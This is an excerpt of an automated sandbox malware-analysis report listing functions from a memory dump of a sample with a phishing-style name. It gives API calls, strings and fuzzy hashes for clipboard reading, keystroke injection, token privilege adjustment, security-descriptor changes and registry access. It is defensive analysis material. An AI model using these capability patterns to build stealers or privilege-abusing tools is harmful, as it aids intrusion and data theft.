Strings

@GUI_DRAGID, xrefs: 00C3D1AA
F, xrefs: 00C3D543

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 75a8fd79c8bb15aa0f259a0e2e1a523c3e82121239bc4ebf67af46b851cedb34
Instruction ID: 818511563197c2466a076d14f53ee80a0caab85f64d5b5de3d2613cc68fe3209
Opcode Fuzzy Hash: 75a8fd79c8bb15aa0f259a0e2e1a523c3e82121239bc4ebf67af46b851cedb34
Instruction Fuzzy Hash: C942AA70614240AFCB25CF28C884FAEBBF5FF48314F14092DF6AA972A1C7319955DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C3804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C3873F

Strings

%d/%02d/%02d, xrefs: 00C38478

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: f14adad10a393a6e21fe22e247c2b4faa3309d3d3bd4307d7dd18bfbecac42cd
Instruction ID: e2f6dcd2280a7d61ea0566028dc726a86252db3499917f60f9a79c5bf06ea5fb
Opcode Fuzzy Hash: f14adad10a393a6e21fe22e247c2b4faa3309d3d3bd4307d7dd18bfbecac42cd
Instruction Fuzzy Hash: 5312BE71520308ABEB259F25CC49FAE7BF9EF45710F204569F925EB2A1DF708A49CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BC710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BC75C2
_memset.LIBCMT ref: 00BC76B1
_memmove.LIBCMT ref: 00BC7C4B
_memmove.LIBCMT ref: 00BC7E4F

Strings

[:>:]], xrefs: 00BC760A
\b(?<=\w), xrefs: 00C03C41
[:<:]], xrefs: 00BC75F1
\b(?=\w), xrefs: 00C03C34
DEFINE, xrefs: 00C025AF
Q\E, xrefs: 00BC81C1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 33fb026ccc142198f1e866c6c5287437bc5befee2275b27bed0d76a4ba26ecc7
Instruction ID: 5be7287e882ee6569048844264cf3990085a7df95ef14ffafd39f95bdecfd0fd
Opcode Fuzzy Hash: 33fb026ccc142198f1e866c6c5287437bc5befee2275b27bed0d76a4ba26ecc7
Instruction Fuzzy Hash: A3939171A44216DBDB24CF98C885BADB7F1FF48710F2581AAE955EB2D0E7709E81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00BB4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BEDA8E
IsIconic.USER32(?), ref: 00BEDA97
ShowWindow.USER32(?,00000009), ref: 00BEDAA4
SetForegroundWindow.USER32(?), ref: 00BEDAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BEDAC4
GetCurrentThreadId.KERNEL32 ref: 00BEDACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BEDAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00BEDAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00BEDAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00BEDAF8
SetForegroundWindow.USER32(?), ref: 00BEDAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEDB10
keybd_event.USER32(00000012,00000000), ref: 00BEDB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEDB25
keybd_event.USER32(00000012,00000000), ref: 00BEDB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEDB33
keybd_event.USER32(00000012,00000000), ref: 00BEDB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEDB42
keybd_event.USER32(00000012,00000000), ref: 00BEDB47
SetForegroundWindow.USER32(?), ref: 00BEDB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00BEDB71

Strings

Shell_TrayWnd, xrefs: 00BEDA89

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9af251a694cc0eb70e39767402b595cd62e28096e7d2e539ac09d0cce7916256
Instruction ID: a980767e4562e90a7a0aec80aefe0b61fb8c05cf9c646d87862e67099153cdcf
Opcode Fuzzy Hash: 9af251a694cc0eb70e39767402b595cd62e28096e7d2e539ac09d0cce7916256
Instruction Fuzzy Hash: 0C316571E50318BBEB216F729C4AF7F3EACEB44B50F114469FA04EA1D1D6B05D01AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C08858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00C08CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C08D0D
Part of subcall function 00C08CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C08D3A
Part of subcall function 00C08CC3: GetLastError.KERNEL32 ref: 00C08D47

_memset.LIBCMT ref: 00C0889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C088ED
CloseHandle.KERNEL32(?), ref: 00C088FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C08915
GetProcessWindowStation.USER32 ref: 00C0892E
SetProcessWindowStation.USER32(00000000), ref: 00C08938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C08952

Part of subcall function 00C08713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C08851), ref: 00C08728
Part of subcall function 00C08713: CloseHandle.KERNEL32(?,?,00C08851), ref: 00C0873A

Strings

winsta0, xrefs: 00C08910
, xrefs: 00C088AA
default, xrefs: 00C0894D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 951d566503d2e203b84ae3e93fc4abbecff1f71aa3d9d5b8a85d01a92f1fa206
Instruction ID: cd3225adb9364d145ec2e73bc1a7ed33107495fdcb8e7dae5a231bf3f57a9221
Opcode Fuzzy Hash: 951d566503d2e203b84ae3e93fc4abbecff1f71aa3d9d5b8a85d01a92f1fa206
Instruction Fuzzy Hash: 04815171D00209AFDF11DFA4DC45AEE7BB8EF04304F44856AF960A61A1DB358E19EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C3F910), ref: 00C24284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C24292
GetClipboardData.USER32(0000000D), ref: 00C2429A
CloseClipboard.USER32 ref: 00C242A6
GlobalLock.KERNEL32(00000000), ref: 00C242C2
CloseClipboard.USER32 ref: 00C242CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C242E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00C242EE
GetClipboardData.USER32(00000001), ref: 00C242F6
GlobalLock.KERNEL32(00000000), ref: 00C24303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C24337
CloseClipboard.USER32 ref: 00C24447

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5db331e89b67e68d99cc3ae2b70fcdadf1297cf37b257737a0b60875e8a40d59
Instruction ID: b8f61f849cdee4c46dc4e15b41f3d53bf324e80077dab8cdbb4f948ba80d3a23
Opcode Fuzzy Hash: 5db331e89b67e68d99cc3ae2b70fcdadf1297cf37b257737a0b60875e8a40d59
Instruction Fuzzy Hash: 7A516835604312ABD315FF61EC86FBF77A8AF84B00F10492DF556D21A1DBB0DA068A62

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C1C9F8
FindClose.KERNEL32(00000000), ref: 00C1CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C1CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C1CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C1CAAF
__swprintf.LIBCMT ref: 00C1CAFB
__swprintf.LIBCMT ref: 00C1CB3E

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

__swprintf.LIBCMT ref: 00C1CB92

Part of subcall function 00BD38D8: __woutput_l.LIBCMT ref: 00BD3931

__swprintf.LIBCMT ref: 00C1CBE0

Part of subcall function 00BD38D8: __flsbuf.LIBCMT ref: 00BD3953
Part of subcall function 00BD38D8: __flsbuf.LIBCMT ref: 00BD396B

__swprintf.LIBCMT ref: 00C1CC2F
__swprintf.LIBCMT ref: 00C1CC7E
__swprintf.LIBCMT ref: 00C1CCCD

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C1CAF5
%02d, xrefs: 00C1CB86, 00C1CB90, 00C1CBDE, 00C1CC2D, 00C1CC7C, 00C1CCCB
%4d, xrefs: 00C1CB38

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 51c15e13d76cdf5eb24fd053f7ccab4c48a34e7b93e964600beb9f062d469760
Instruction ID: cb6d57c27181de3b506940b34b30a7e0c7f521ed41a0c2b99676459f341d87c6
Opcode Fuzzy Hash: 51c15e13d76cdf5eb24fd053f7ccab4c48a34e7b93e964600beb9f062d469760
Instruction Fuzzy Hash: D7A13CB1508304ABC710FF64C886EFFB7ECAF95700F404969F696D2191EA74DA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00C1F221
_wcscmp.LIBCMT ref: 00C1F236
_wcscmp.LIBCMT ref: 00C1F24D
GetFileAttributesW.KERNEL32(?), ref: 00C1F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00C1F279
FindNextFileW.KERNEL32(00000000,?), ref: 00C1F291
FindClose.KERNEL32(00000000), ref: 00C1F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00C1F2B8
_wcscmp.LIBCMT ref: 00C1F2DF
_wcscmp.LIBCMT ref: 00C1F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1F308
SetCurrentDirectoryW.KERNEL32(00C6A5A0), ref: 00C1F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1F330
FindClose.KERNEL32(00000000), ref: 00C1F33D
FindClose.KERNEL32(00000000), ref: 00C1F34F

Strings

*.*, xrefs: 00C1F2B3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: bb3ecf2507f92d32136c31f6d4d90f57f4d96e19109bcb1aa95d9bbed63d5779
Instruction ID: 9c82a5e583f49fcafb33e3d795b1d6b1fff298127cbe307e4deeedeba1cb3819
Opcode Fuzzy Hash: bb3ecf2507f92d32136c31f6d4d90f57f4d96e19109bcb1aa95d9bbed63d5779
Instruction Fuzzy Hash: 7331B6769006196ADB10DBB4DC48BDE73EC9F09360F50457AF925E30A0EB30DB869A50

Uniqueness

Uniqueness Score: -1.00%

Function 00C30AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C30BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C3F910,00000000,?,00000000,?,?), ref: 00C30C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C30C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C30D1D
RegCloseKey.ADVAPI32(?), ref: 00C3103D
RegCloseKey.ADVAPI32(00000000), ref: 00C3104A

Strings

REG_BINARY, xrefs: 00C30FD8
REG_QWORD, xrefs: 00C30F8B
REG_SZ, xrefs: 00C30D5B
REG_DWORD, xrefs: 00C30F0E
REG_MULTI_SZ, xrefs: 00C30E05
REG_EXPAND_SZ, xrefs: 00C30CBA

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: d7a13da8725880bfa045af3c4fbba721fc5906e4c2d7b1ebcc2ef039cb813f67
Instruction ID: 3c5dd638d9264648ecdd23ed3350161cbb496237725d7a0d913207cc25174c81
Opcode Fuzzy Hash: d7a13da8725880bfa045af3c4fbba721fc5906e4c2d7b1ebcc2ef039cb813f67
Instruction Fuzzy Hash: F7029F752106019FCB14EF25C891E6AB7E5FF89714F0488ADF99A9B362CB70ED41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00C1F37E
_wcscmp.LIBCMT ref: 00C1F393
_wcscmp.LIBCMT ref: 00C1F3AA

Part of subcall function 00C145C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C145DC

FindNextFileW.KERNEL32(00000000,?), ref: 00C1F3D9
FindClose.KERNEL32(00000000), ref: 00C1F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00C1F400
_wcscmp.LIBCMT ref: 00C1F427
_wcscmp.LIBCMT ref: 00C1F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1F450
SetCurrentDirectoryW.KERNEL32(00C6A5A0), ref: 00C1F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1F478
FindClose.KERNEL32(00000000), ref: 00C1F485
FindClose.KERNEL32(00000000), ref: 00C1F497

Strings

*.*, xrefs: 00C1F3FB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: c7a5a7dae6dca32600fecc09e1d8dde2d72d4bc7c3c39a87dbf42f66d9d8744b
Instruction ID: 0b0c8b37cd7f18c7903ad42d9a5b76e454a0cae24ddaca26e82d707cc4423832
Opcode Fuzzy Hash: c7a5a7dae6dca32600fecc09e1d8dde2d72d4bc7c3c39a87dbf42f66d9d8744b
Instruction Fuzzy Hash: 3031D77650161D6BCB109BA4DC88BDF77AC9F0A364F10027AE964A31A1D730DF86DA64

Uniqueness

Uniqueness Score: -1.00%

Function 00C081F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C08766
Part of subcall function 00C0874A: GetLastError.KERNEL32(?,00C0822A,?,?,?), ref: 00C08770
Part of subcall function 00C0874A: GetProcessHeap.KERNEL32(00000008,?,?,00C0822A,?,?,?), ref: 00C0877F
Part of subcall function 00C0874A: HeapAlloc.KERNEL32(00000000,?,00C0822A,?,?,?), ref: 00C08786
Part of subcall function 00C0874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0879D

Part of subcall function 00C087E7: GetProcessHeap.KERNEL32(00000008,00C08240,00000000,00000000,?,00C08240,?), ref: 00C087F3
Part of subcall function 00C087E7: HeapAlloc.KERNEL32(00000000,?,00C08240,?), ref: 00C087FA
Part of subcall function 00C087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C08240,?), ref: 00C0880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C0825B
_memset.LIBCMT ref: 00C08270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C0828F
GetLengthSid.ADVAPI32(?), ref: 00C082A0
GetAce.ADVAPI32(?,00000000,?), ref: 00C082DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C082F9
GetLengthSid.ADVAPI32(?), ref: 00C08316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C08325
HeapAlloc.KERNEL32(00000000), ref: 00C0832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C0834D
CopySid.ADVAPI32(00000000), ref: 00C08354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C08385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C083AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C083BF

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c9586d52e75914a1d9bc0b1bf6121300316ca252d602fd6dfea2d01fb631c123
Instruction ID: e8da01c46e7165bf75dc229c2ee65ce5ce74219f0ebc62792cbf35272bc525cf
Opcode Fuzzy Hash: c9586d52e75914a1d9bc0b1bf6121300316ca252d602fd6dfea2d01fb631c123
Instruction Fuzzy Hash: CD615971900209ABDF049FA4DD85BEEBBB9FF44710F048569F865A62A1DB319A09CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

CRLF), xrefs: 00C016FA
UCP), xrefs: 00C01546
LF), xrefs: 00C016DD
NO_START_OPT), xrefs: 00C01588
UTF16), xrefs: 00C01508
ANYCRLF), xrefs: 00C01734
CR), xrefs: 00C016C0
BSR_ANYCRLF), xrefs: 00C01757
UTF), xrefs: 00C01533
LIMIT_RECURSION=, xrefs: 00C01635
BSR_UNICODE), xrefs: 00C01771
ANY), xrefs: 00C01717
LIMIT_MATCH=, xrefs: 00C015A9
NO_AUTO_POSSESS), xrefs: 00C01567

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 539d6c3ca416797ed8c2e4b6032206c8bb4be90e1916e43721e7bde977d31668
Instruction ID: ca17f860eef423648a34652977792e0617e44bc4adecdc960c1d2beba3c5e156
Opcode Fuzzy Hash: 539d6c3ca416797ed8c2e4b6032206c8bb4be90e1916e43721e7bde977d31668
Instruction Fuzzy Hash: 52725275E002199BDF24CF59C890BAEB7F5FF48710F1481AAE955EB290DB709E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C30665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C30038,?,?), ref: 00C310BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C30737

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C307D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C3086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C30AAD
RegCloseKey.ADVAPI32(00000000), ref: 00C30ABA

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
